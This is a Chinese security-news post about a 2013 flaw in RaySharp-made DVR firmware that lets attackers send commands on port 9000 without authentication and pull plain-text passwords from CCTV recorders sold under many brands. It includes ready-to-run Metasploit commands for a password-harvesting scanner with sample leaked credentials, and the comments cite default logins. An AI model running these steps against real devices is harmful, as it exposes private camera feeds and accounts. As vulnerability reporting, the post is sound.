DVR漏洞使黑客轻松控制CCTV摄像机(MSF已更新模块)

2013-01-30 248180人围观 ,发现 16 个不明物体 资讯

感谢投递

安全研究人员称,CCTV众多视频录制设备正面临被黑风险,黑客可以监控、复制和删除视频流。

安全人员补充到,除非系统安装了合适的固件,否则DVR平台固件都能成为攻击者向这些网络视频设备进行攻击的切入点。这些易受攻击的CCTV设备是总部位于广东的RaySharp公司生产的。

攻击上周首先被发现,黑客可以通过DVR 9000端口发送命令而无须任何认证,这样黑客就可直接进入到DVR的web控制面板。更悲催的是DVR通常支持UPnP(通用即插即用,可以通过网络驱动设备),网上就能实施控制。此外,RaySharp DVR还以明文形式存储用户名和密码。

事实上,受影响的厂商还包括:Swann, Lorex, URMET, KGuard, Defender, DEAPA/DSP Cop, SVAT, Zmodo, BCS, Bolide, EyeForce, Atlantis, Protectron, Greatek, Soyo, Hi-View, Cosmos, and J2000等等。扫描显示,全世界150多个国家超过58000视频设备可被攻击。


metasploit下已有了相关模块

$ sudo -s -E
# msfconsole
msf> use auxiliary/scanner/misc/raysharp_dvr_passwords
msf  auxiliary(raysharp_dvr_passwords) > set RHOSTS 192.168.0.0/24
msf  auxiliary(raysharp_dvr_passwords) > set THREADS 256
msf  auxiliary(raysharp_dvr_passwords) > run
[+] 192.168.0.153:9000 (user='admin' pass='1234546') mac=00-23-63-63-63-63 version=V2.1-20110716

附:

RaySharp安联锐视,是全球领先的数字视频监控解决方案提供商,以珠海为总部,营销网络覆盖全球近百个国家和地区。安联锐视在中国先后为北京天安门广场、2008年北京奥运会场馆、深圳国际会展中心、中山市政府和澳门大学横琴校区等数百万企事业单位、商业机构、公共事业、政府机关和家庭社区提供数字监控服务。

延伸阅读:

UPnP爆协议漏洞,数千万个人设备受威胁

via[theregister]

这些评论亮了

  • emodark (1级) Script kid 回复
    不好意思,我想'赞'的,点错了,希望管理员帮忙改过了。十分抱歉。
    )19( 亮了
  • 基本上所有带有网络主控端的DVR系统,都是这样的。直接默认账号密码,admin 888888 之类的。其实也就可以看看录像。根本无法进一步提升权限
    )9( 亮了
  • Freedom 回复
    :cool: CCTV 能把禁播的放CCTV么
    )7( 亮了
发表评论

已有 16 条评论

取消
Loading...
css.php